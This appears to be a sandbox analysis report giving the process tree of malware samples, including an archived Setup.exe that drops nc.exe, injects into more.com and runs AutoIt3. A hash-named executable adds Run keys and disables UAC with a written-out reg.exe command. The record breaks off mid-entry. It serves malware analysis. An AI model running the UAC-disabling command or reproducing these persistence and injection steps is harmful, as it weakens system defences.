- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,10469530977205901978,1400793979011051205,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3688 /prefetch:1
    3⤵
    PID:3020
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,10469530977205901978,1400793979011051205,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3708 /prefetch:1
    3⤵
    PID:2868
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.safetyoptimizer.com/lp/lp1.aspx?cfg=6
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  PID:1468
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffab0c646f8,0x7ffab0c64708,0x7ffab0c64718
    3⤵
    PID:4744
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,14430627242591806251,10219140666468900276,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:2
    3⤵
    PID:3228
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,14430627242591806251,10219140666468900276,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 /prefetch:3
    3⤵
    PID:3772
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2148,14430627242591806251,10219140666468900276,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2696 /prefetch:8
    3⤵
    PID:5044
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,14430627242591806251,10219140666468900276,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
    3⤵
    PID:3740
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,14430627242591806251,10219140666468900276,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
    3⤵
    PID:212
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,14430627242591806251,10219140666468900276,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5056 /prefetch:1
    3⤵
    PID:3088
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,14430627242591806251,10219140666468900276,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3780 /prefetch:8
    3⤵
    PID:1840
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,14430627242591806251,10219140666468900276,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3780 /prefetch:8
    3⤵
    PID:2344
- C:\Program Files (x86)\Spyware Terminator\Tools\analyzefile.exe
  "C:\Program Files (x86)\Spyware Terminator\Tools\analyzefile.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
  PID:3824

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4868

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4356

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2908

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3212

C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe
"C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe" /SCANCONT "C:\Users\Admin\AppData\Local\Temp\STShellMenu_E61F685.txt"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1508

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
PID:1900
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffac01dcc40,0x7ffac01dcc4c,0x7ffac01dcc58
  2⤵
  PID:1844
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1864,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1860 /prefetch:2
  2⤵
  PID:3540
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2204,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2216 /prefetch:3
  2⤵
  PID:5112
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2208,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2300 /prefetch:8
  2⤵
  PID:880
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3168,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3192 /prefetch:1
  2⤵
  PID:1864
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3256,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3420 /prefetch:1
  2⤵
  PID:3568
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4592,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4608 /prefetch:1
  2⤵
  PID:4436
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3736,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4796 /prefetch:8
  2⤵
  PID:4116
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4764,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4524 /prefetch:8
  2⤵
  PID:5040
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4968,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5000 /prefetch:8
  2⤵
  PID:4336
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4736,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4732 /prefetch:8
  2⤵
  PID:3056
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4784,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4848 /prefetch:8
  2⤵
  PID:4620
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5224,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5232 /prefetch:8
  2⤵
  PID:2080
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5172,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4760 /prefetch:8
  2⤵
  PID:2460
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4268,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5168 /prefetch:8
  2⤵
  PID:3736
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4864,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4928 /prefetch:2
  2⤵
  PID:2292
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5304,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5316 /prefetch:1
  2⤵
  PID:2908
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=3352,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3344 /prefetch:1
  2⤵
  PID:4364
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=5496,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5296 /prefetch:8
  2⤵
  PID:388
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5164,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4836 /prefetch:8
  2⤵
  PID:4604
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=4836,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3420 /prefetch:1
  2⤵
  PID:2988
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=3192,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5132 /prefetch:1
  2⤵
  PID:3508
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --field-trial-handle=5368,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4848 /prefetch:1
  2⤵
  PID:4964
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=5128,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4952 /prefetch:1
  2⤵
  PID:1628
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --field-trial-handle=4128,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5152 /prefetch:1
  2⤵
  PID:2172
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --field-trial-handle=5612,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5808 /prefetch:1
  2⤵
  PID:3512
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=240,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4124 /prefetch:8
  2⤵
  PID:1532
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5844,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6152 /prefetch:8
  2⤵
  PID:920
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --field-trial-handle=6160,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6184 /prefetch:1
  2⤵
  PID:328
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5848,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5960 /prefetch:8
  2⤵
  PID:4400
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5728,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6420 /prefetch:8
  2⤵
  PID:4316
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --field-trial-handle=6416,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1524 /prefetch:1
  2⤵
  PID:1112
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --field-trial-handle=6464,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6468 /prefetch:1
  2⤵
  PID:4208
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6676,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6644 /prefetch:8
  2⤵
  PID:3976
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6780,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6784 /prefetch:8
  2⤵
  PID:2456
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --field-trial-handle=6308,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6500 /prefetch:1
  2⤵
  PID:2864
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --field-trial-handle=6920,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5400 /prefetch:1
  2⤵
  PID:4412
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6800,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6532 /prefetch:8
  2⤵
  PID:3696

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:3924

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4144

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:844

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4fc 0x3e0
1⤵
PID:4788

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap27291:138:7zEvent21663
1⤵
PID:2624

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\➤⇌Δ†ε$†➤Sε†μρ➤P@$$ωrÐ➤((9192))-B1➤⇌b1!\" -an -ai#7zMap22842:210:7zEvent6884
1⤵
PID:476

C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe
"C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe" /SCANCONT "C:\Users\Admin\AppData\Local\Temp\STShellMenu_E6367B8.txt"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2240

C:\Users\Admin\Downloads\➤⇌Δ†ε$†➤Sε†μρ➤P@$$ωrÐ➤((9192))-B1➤⇌b1!\➤⇌Δ†ε$†➤Sε†μρ➤P@$$ωrÐ➤((9192))-B1➤⇌\Setup.exe
"C:\Users\Admin\Downloads\➤⇌Δ†ε$†➤Sε†μρ➤P@$$ωrÐ➤((9192))-B1➤⇌b1!\➤⇌Δ†ε$†➤Sε†μρ➤P@$$ωrÐ➤((9192))-B1➤⇌\Setup.exe"
1⤵
- Suspicious use of SetThreadContext
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:1084
- C:\Users\Admin\AppData\Roaming\danc\PJJBIBGPAFFULS\nc.exe
  C:\Users\Admin\AppData\Roaming\danc\PJJBIBGPAFFULS\nc.exe
  2⤵
  - Executes dropped EXE
  PID:2536
- C:\Windows\SysWOW64\more.com
  C:\Windows\SysWOW64\more.com
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: MapViewOfSection
  PID:4300
- - C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe
    C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:1524

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:5040

C:\Users\Admin\Downloads\➤⇌Δ†ε$†➤Sε†μρ➤P@$$ωrÐ➤((9192))-B1➤⇌b1!\➤⇌Δ†ε$†➤Sε†μρ➤P@$$ωrÐ➤((9192))-B1➤⇌\Setup.exe
"C:\Users\Admin\Downloads\➤⇌Δ†ε$†➤Sε†μρ➤P@$$ωrÐ➤((9192))-B1➤⇌b1!\➤⇌Δ†ε$†➤Sε†μρ➤P@$$ωrÐ➤((9192))-B1➤⇌\Setup.exe"
1⤵
- Suspicious use of SetThreadContext
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:2648
- C:\Users\Admin\AppData\Roaming\danc\PJJBIBGPAFFULS\nc.exe
  C:\Users\Admin\AppData\Roaming\danc\PJJBIBGPAFFULS\nc.exe
  2⤵
  - Executes dropped EXE
  PID:1244
- C:\Windows\SysWOW64\more.com
  C:\Windows\SysWOW64\more.com
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: MapViewOfSection
  PID:1424
- - C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe
    C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:2948

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:2988

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap4708:190:7zEvent29762
1⤵
PID:1084

C:\Users\Admin\Downloads\0d4bf4e1a47fa2cfdb5cdc23d8a2b1552c1d82c307e1eec95297e62a478d2f2d.exe
"C:\Users\Admin\Downloads\0d4bf4e1a47fa2cfdb5cdc23d8a2b1552c1d82c307e1eec95297e62a478d2f2d.exe"
1⤵
- Adds policy Run key to start application
- Adds Run key to start application
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:2460
- C:\Windows\SysWOW64\cmd.exe
  /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4068
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:2404
- C:\ProgramData\BraveShared\BraveSharedUpdater.exe
  "C:\ProgramData\BraveShared\BraveSharedUpdater.exe"
  2⤵
  - Adds policy Run key to start application
  - Adds Run key to start application
  - Suspicious use of SetThreadContext
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: MapViewOfSection
  PID:3772
- - C:\Windows\SysWOW64\cmd.exe
